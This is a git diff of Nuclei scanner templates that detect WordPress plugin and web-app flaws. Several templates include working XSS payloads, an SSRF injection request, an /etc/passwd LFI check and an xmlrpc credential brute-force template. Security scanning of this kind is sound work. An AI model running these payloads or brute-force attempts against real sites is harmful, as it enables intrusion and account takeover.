reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, + which will execute within the browser of any logged-in admin who views the link + reference: + - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated + requests: - raw: - | @@ -16,9 +20,11 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: @@ -26,10 +32,15 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' + - 'toplevel_page_snippets' + - 'Search results in tag' + condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/wordpress/wp-config-setup-11427.yaml b/poc/wordpress/wp-config-setup-11427.yaml index ca21c2f30d..ef9c4c0a45 100644 --- a/poc/wordpress/wp-config-setup-11427.yaml +++ b/poc/wordpress/wp-config-setup-11427.yaml @@ -1,19 +1,24 @@ id: wp-config-setup + info: name: WordPress Setup Configuration author: princechaddha severity: high - reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ tags: wordpress,setup + requests: - method: GET path: - "{{BaseURL}}/wp-admin/setup-config.php?step=1" + matchers-condition: and matchers: - type: word words: - "Below you should enter your database connection details." + - type: status status: - 200 diff --git a/poc/wordpress/wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241.yaml b/poc/wordpress/wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241.yaml new file mode 100644 index 0000000000..80f81e36d0 --- /dev/null +++ b/poc/wordpress/wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241.yaml @@ -0,0 +1,59 @@ +id: wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241 + +info: + name: > + WP Cookie Law Info <= 1.1 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0ea99921-5dda-42aa-99f8-43e52f3362c8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-cookie-law-info/" + google-query: inurl:"/wp-content/plugins/wp-cookie-law-info/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-cookie-law-info,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cookie-law-info/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cookie-law-info" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/wordpress/wp-finder-xss-11450.yaml b/poc/wordpress/wp-finder-xss-11450.yaml old mode 100755 new mode 100644 index c2141ac880..0111970059 --- a/poc/wordpress/wp-finder-xss-11450.yaml +++ b/poc/wordpress/wp-finder-xss-11450.yaml @@ -1,29 +1,24 @@ id: wp-finder-xss - info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' - + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "<script>alert(123);</script>" + - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-idx-broker-platinum-listing-11472.yaml b/poc/wordpress/wp-idx-broker-platinum-listing-11472.yaml index 6e2ffaab6c..b1b829e9e2 100644 --- a/poc/wordpress/wp-idx-broker-platinum-listing-11472.yaml +++ b/poc/wordpress/wp-idx-broker-platinum-listing-11472.yaml @@ -1,4 +1,5 @@ id: wp-idx-broker-platinum-listing + info: name: WordPress Plugin Idx Broker Platinum Listing author: pussycat0x @@ -7,17 +8,22 @@ info: reference: - https://www.exploit-db.com/ghdb/6416 tags: wordpress,listing,plugin + requests: + - method: GET path: - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/" + matchers-condition: and + matchers: - type: word words: - "Index of" - "wp-content/plugins/idx-broker-platinum/" condition: and + - type: status status: - 200 diff --git a/poc/wordpress/wp-iwp-client-listing-11478.yaml b/poc/wordpress/wp-iwp-client-listing-11478.yaml index 1927665ec5..8968c15c52 100644 --- a/poc/wordpress/wp-iwp-client-listing-11478.yaml +++ b/poc/wordpress/wp-iwp-client-listing-11478.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6427 + reference: https://www.exploit-db.com/ghdb/6427 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-license-file-11489.yaml b/poc/wordpress/wp-license-file-11489.yaml index d5777717de..57edfbbd1d 100644 --- a/poc/wordpress/wp-license-file-11489.yaml +++ b/poc/wordpress/wp-license-file-11489.yaml @@ -1,17 +1,22 @@ id: wp-license-file + info: name: WordPress license file disclosure author: yashgoti severity: info + tags: wordpress + requests: - method: GET path: - "{{BaseURL}}/license.txt" + matchers-condition: and matchers: - type: word words: - "WordPress - Web publishing software" + - type: status status: - 200 diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml index 42ab9af2c0..023e18c389 100644 --- a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml +++ b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml @@ -1,22 +1,27 @@ id: wp-mailchimp-log-exposure + info: name: WordPress Mailchimp 4 Debug Log Exposure author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content tags: logs,wordpress,exposure,mailchimp + requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "WARNING: Form" + - type: word words: - 'text/plain' diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml index 89e2aa0442..08f2810f63 100644 --- a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +++ b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml @@ -1,12 +1,14 @@ id: wp-multiple-theme-ssrf + info: name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot severity: high - tags: wordpress,rce,ssrf reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 + tags: wordpress,rce,ssrf + requests: - raw: - | @@ -15,6 +17,7 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "Example Domain" - "protocol_version" part: body + - type: status status: - 200 diff --git a/poc/wordpress/wp-oxygen-theme-lfi-11521.yaml b/poc/wordpress/wp-oxygen-theme-lfi-11521.yaml index d407ffa1b0..903bb5679d 100644 --- a/poc/wordpress/wp-oxygen-theme-lfi-11521.yaml +++ b/poc/wordpress/wp-oxygen-theme-lfi-11521.yaml @@ -1,10 +1,16 @@ id: wp-oxygen-theme-lfi info: - name: WordPress Oxygen-Theme Themes LFI + name: WordPress Oxygen-Theme - Local File Inclusion author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wp - reference: https://cxsecurity.com/issue/WLB-2019030178 + description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'. + reference: + - https://cxsecurity.com/issue/WLB-2019030178 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-theme,lfi requests: - method: GET path: @@ -20,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-phpfreechat-xss-11524.yaml b/poc/wordpress/wp-phpfreechat-xss-11524.yaml index c908448c5d..6deb475d0b 100644 --- a/poc/wordpress/wp-phpfreechat-xss-11524.yaml +++ b/poc/wordpress/wp-phpfreechat-xss-11524.yaml @@ -4,7 +4,8 @@ info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54332/info + reference: + - https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin requests: diff --git a/poc/wordpress/wp-popup-listing-11545.yaml b/poc/wordpress/wp-popup-listing-11545.yaml index 06a3982bd6..c60d311327 100644 --- a/poc/wordpress/wp-popup-listing-11545.yaml +++ b/poc/wordpress/wp-popup-listing-11545.yaml @@ -1,19 +1,23 @@ id: wordpress-popup-listing + info: name: WordPress Popup Plugin Directory Listing author: aashiq severity: info description: Searches for sensitive directories present in the wordpress-popup plugin. tags: wordpress,listing,plugin + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Index of" diff --git a/poc/wordpress/wp-popups-lite-8a0bb5bdfaa7dceea6e2749ac7444e7f.yaml b/poc/wordpress/wp-popups-lite-8a0bb5bdfaa7dceea6e2749ac7444e7f.yaml new file mode 100644 index 0000000000..bdbcab10d0 --- /dev/null +++ b/poc/wordpress/wp-popups-lite-8a0bb5bdfaa7dceea6e2749ac7444e7f.yaml @@ -0,0 +1,59 @@ +id: wp-popups-lite-8a0bb5bdfaa7dceea6e2749ac7444e7f + +info: + name: > + WP Popups – WordPress Popup builder <= 2.2.0.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/578892f2-9841-4493-8445-61b79feb4764?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-popups-lite/" + google-query: inurl:"/wp-content/plugins/wp-popups-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-popups-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-popups-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-popups-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0.1') \ No newline at end of file diff --git a/poc/wordpress/wp-prostore-open-redirect-11548.yaml b/poc/wordpress/wp-prostore-open-redirect-11548.yaml index a94618bc3b..820d21e476 100644 --- a/poc/wordpress/wp-prostore-open-redirect-11548.yaml +++ b/poc/wordpress/wp-prostore-open-redirect-11548.yaml @@ -1,4 +1,5 @@ id: wp-prostore-open-redirect + info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko @@ -7,12 +8,14 @@ info: reference: - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect + requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header + part: header \ No newline at end of file diff --git a/poc/wordpress/wp-qards-listing-11551.yaml b/poc/wordpress/wp-qards-listing-11551.yaml index 0888ca8567..b9ba98785d 100644 --- a/poc/wordpress/wp-qards-listing-11551.yaml +++ b/poc/wordpress/wp-qards-listing-11551.yaml @@ -1,14 +1,17 @@ id: wp-qards-listing + info: name: WordPress Plugin Qards author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. tags: wordpress,listing,wp-plugin,wp + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/qards/" + matchers-condition: and matchers: - type: word @@ -16,6 +19,7 @@ requests: - "Index of" - "/wp-content/plugins/qards" condition: and + - type: status status: - 200 diff --git a/poc/wordpress/wp-simple-fields-lfi-11571.yaml b/poc/wordpress/wp-simple-fields-lfi-11571.yaml index e26d5566c9..ce5ae50dd1 100644 --- a/poc/wordpress/wp-simple-fields-lfi-11571.yaml +++ b/poc/wordpress/wp-simple-fields-lfi-11571.yaml @@ -4,7 +4,8 @@ info: name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE author: 0x240x23elu severity: high - reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html + reference: + - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html tags: wordpress,wp-plugin,lfi requests: diff --git a/poc/wordpress/wp-super-forms-11585.yaml b/poc/wordpress/wp-super-forms-11585.yaml index f00d7a8dbc..d9003227fd 100644 --- a/poc/wordpress/wp-super-forms-11585.yaml +++ b/poc/wordpress/wp-super-forms-11585.yaml @@ -1,11 +1,11 @@ id: wordpress-super-forms info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: https://www.exploit-db.com/ghdb/6776 - tags: wordpress,listing + tags: wordpress,listing,plugin requests: - method: GET path: diff --git a/poc/wordpress/wp-total-branding-a93e0c941bc967f370dfcf2eff6f96b0.yaml b/poc/wordpress/wp-total-branding-a93e0c941bc967f370dfcf2eff6f96b0.yaml new file mode 100644 index 0000000000..54cab4fe0c --- /dev/null +++ b/poc/wordpress/wp-total-branding-a93e0c941bc967f370dfcf2eff6f96b0.yaml @@ -0,0 +1,59 @@ +id: wp-total-branding-a93e0c941bc967f370dfcf2eff6f96b0 + +info: + name: > + WP Total Branding <= 1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via title Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b6ac92f-2ad1-4528-b157-5e49d6f224a5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-total-branding/" + google-query: inurl:"/wp-content/plugins/wp-total-branding/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-total-branding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-total-branding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-total-branding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/wordpress/wp-tutor-lfi-11599.yaml b/poc/wordpress/wp-tutor-lfi-11599.yaml index 4362f3d8af..9214a5fa94 100644 --- a/poc/wordpress/wp-tutor-lfi-11599.yaml +++ b/poc/wordpress/wp-tutor-lfi-11599.yaml @@ -1,16 +1,10 @@ id: wp-tutor-lfi info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://www.exploit-db.com/exploits/48058 tags: wordpress,wp-plugin,lfi requests: @@ -22,6 +16,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/07/29 + part: body \ No newline at end of file diff --git a/poc/wordpress/wp-upload-data-11604.yaml b/poc/wordpress/wp-upload-data-11604.yaml old mode 100644 new mode 100755 index 96634b10c2..4723898023 --- a/poc/wordpress/wp-upload-data-11604.yaml +++ b/poc/wordpress/wp-upload-data-11604.yaml @@ -1,24 +1,36 @@ id: wordpress-upload-data info: name: wordpress-upload-data - author: pussycat0x + author: + - l0ne1y + description: | + WordPress uploads 目录 data.txt 信息泄漏漏洞 + WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 + 远程 WordPress 安装在“/wp-content/uploads/”文件夹下包含一个文件“data.txt”,其中包含敏感信息。 severity: medium - description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. - reference: https://www.exploit-db.com/ghdb/7040 - tags: wordpress,listing + remediation: |- + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/data.txt" - matchers-condition: and - matchers: - - type: word - words: - - "admin:" - - type: word - part: header - words: - - "text/plain" - - type: status - status: - - 200 +- matchers: + - type: word + words: + - 'admin:' + - type: word + part: header + words: + - text/plain + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wp-content/uploads/data.txt' + method: GET diff --git a/poc/wordpress/wp-userenum.yaml b/poc/wordpress/wp-userenum.yaml index e1a6705b5f..000d06e490 100644 --- a/poc/wordpress/wp-userenum.yaml +++ b/poc/wordpress/wp-userenum.yaml @@ -7,30 +7,87 @@ info: http: - raw: - | - GET /wp-json/wp/v2/users/ HTTP/1.1 + GET /wp-config.php/ HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - | - GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1 + GET /xmlrpc.php/ HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - | - GET /wp-json/wp/v2/uSERS/ HTTP/1.1 + GET /functions.php/ HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - stop-at-first-match: true + - | + GET /wp-settings.php/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + + - | + GET /phpmyadmin/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /wp-admin/admin-ajax.php/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /wp-includes/load.php/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + + - | + GET /wp-content/uploads/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /wp-content/debug.log HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /.htaccess/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + + - | + GET /license.txt/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /readme.html/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /wp-activate.php/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET /wp-cron.php/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + GET wp-includes/ HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + matchers: - type: status status: - 200 - - type: word - words: - - 'id' - - 'name' - - + - 300 diff --git a/poc/wordpress/wp-xmlrpc-brute-force-11624.yaml b/poc/wordpress/wp-xmlrpc-brute-force-11624.yaml index 26b60896bf..ee80efb91c 100644 --- a/poc/wordpress/wp-xmlrpc-brute-force-11624.yaml +++ b/poc/wordpress/wp-xmlrpc-brute-force-11624.yaml @@ -1,13 +1,15 @@ id: wordpress-xmlrpc-brute-force + info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high - description: This template bruteforces username and passwords through xmlrpc.php being available. + description: Ths template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz + requests: - raw: - | @@ -27,15 +29,18 @@ requests: </param> </params> </methodCall> + attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/wordpress/wpdm-cache-session-11436.yaml b/poc/wordpress/wpdm-cache-session-11436.yaml index ba8153e31e..9e12c4ad90 100644 --- a/poc/wordpress/wpdm-cache-session-11436.yaml +++ b/poc/wordpress/wpdm-cache-session-11436.yaml @@ -3,7 +3,8 @@ info: name: Wpdm-Cache Session author: dhiyaneshDk severity: medium - reference: https://www.exploit-db.com/ghdb/7004 + reference: + - https://www.exploit-db.com/ghdb/7004 tags: wordpress requests: - method: GET diff --git a/poc/wordpress/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml b/poc/wordpress/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml new file mode 100644 index 0000000000..ce6d9f7bdc --- /dev/null +++ b/poc/wordpress/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml @@ -0,0 +1,59 @@ +id: wpfavicon-b8d7827bcbedea7a40db5bb08217d076 + +info: + name: > + WPFavicon <= 2.1.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22f98afa-eb14-4326-9971-49092c711249?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpfavicon/" + google-query: inurl:"/wp-content/plugins/wpfavicon/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpfavicon,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpfavicon/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpfavicon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/wordpress/wpmudev-my-calender-xss-11502.yaml b/poc/wordpress/wpmudev-my-calender-xss-11502.yaml index 238ee01e7c..e17d0a5479 100644 --- a/poc/wordpress/wpmudev-my-calender-xss-11502.yaml +++ b/poc/wordpress/wpmudev-my-calender-xss-11502.yaml @@ -1,24 +1,29 @@ -id: my-calender-xss -info: - name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) - author: dhiyaneshDk - severity: medium - reference: https://wpscan.com/vulnerability/9267 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' - matchers-condition: and - matchers: - - type: word - words: - - "<svg/onload=confirm(/{{randstr}}/)>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 +id: my-calender-xss + +info: + name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + reference: https://wpscan.com/vulnerability/9267 + tags: wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "<svg/onload=confirm(/{{randstr}}/)>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/wordpress/wptouch-open-redirect-11594.yaml b/poc/wordpress/wptouch-open-redirect-11594.yaml index 2468d968b4..c33b1c8765 100644 --- a/poc/wordpress/wptouch-open-redirect-11594.yaml +++ b/poc/wordpress/wptouch-open-redirect-11594.yaml @@ -1,4 +1,5 @@ id: wptouch-open-redirect + info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko @@ -14,10 +15,12 @@ info: reference: - https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress + requests: - method: GET path: - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + matchers: - type: regex regex: diff --git a/poc/xss/elex-woocommerce-xss-7199.yaml b/poc/xss/elex-woocommerce-xss-7199.yaml index 8826c9772d..0a91138dfb 100644 --- a/poc/xss/elex-woocommerce-xss-7199.yaml +++ b/poc/xss/elex-woocommerce-xss-7199.yaml @@ -1,11 +1,19 @@ id: elex-woocommerce-xss + info: - name: ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting author: dhiyaneshDk - severity: medium - description: The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context. - reference: https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + severity: high + description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and + executing it in a logged in admin context. + reference: + - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: wordpress,wp-plugin,xss,authenticated,woocommerce + requests: - raw: - | @@ -19,6 +27,7 @@ requests: - | GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: @@ -26,10 +35,14 @@ requests: part: body words: - "</script><script>alert(document.domain)</script>" + - type: word part: header words: - text/html + - type: status status: - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/poc/xss/feedwordpress-xss-7459.yaml b/poc/xss/feedwordpress-xss-7459.yaml index 81215e76ac..20cc24cc81 100644 --- a/poc/xss/feedwordpress-xss-7459.yaml +++ b/poc/xss/feedwordpress-xss-7459.yaml @@ -5,7 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. - reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + reference: + - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 tags: wordpress,wp-plugin,xss,feedwordpress,authenticated requests: diff --git a/poc/xss/global-domains-xss-7717.yaml b/poc/xss/global-domains-xss-7717.yaml index 94ba8315ed..fe411fef77 100644 --- a/poc/xss/global-domains-xss-7717.yaml +++ b/poc/xss/global-domains-xss-7717.yaml @@ -3,7 +3,8 @@ info: name: Global Domains International XSS author: princechaddha severity: medium - reference: https://cxsecurity.com/issue/WLB-2018020247 + reference: + - https://cxsecurity.com/issue/WLB-2018020247 tags: globaldomains,xss requests: - method: GET diff --git a/poc/xss/laravel-ignition-xss-8592.yaml b/poc/xss/laravel-ignition-xss-8592.yaml index 37768774ad..18ec20de58 100644 --- a/poc/xss/laravel-ignition-xss-8592.yaml +++ b/poc/xss/laravel-ignition-xss-8592.yaml @@ -3,6 +3,10 @@ info: name: Laravel Ignition XSS author: 0x_Akoko severity: medium + description: | + Laravel's Ignition contains a cross-site scripting vulnerability when debug mode is enabled. + remediation: | + Disable Laravel's debug mode by setting APP_DEBUG to false. reference: - https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/ - https://github.com/facade/ignition/issues/273 @@ -17,10 +21,10 @@ requests: part: body words: - "Undefined index: --><svg onload=alert(document.domain)> in file" - - type: status - status: - - 500 - type: word part: header words: - "text/html" + - 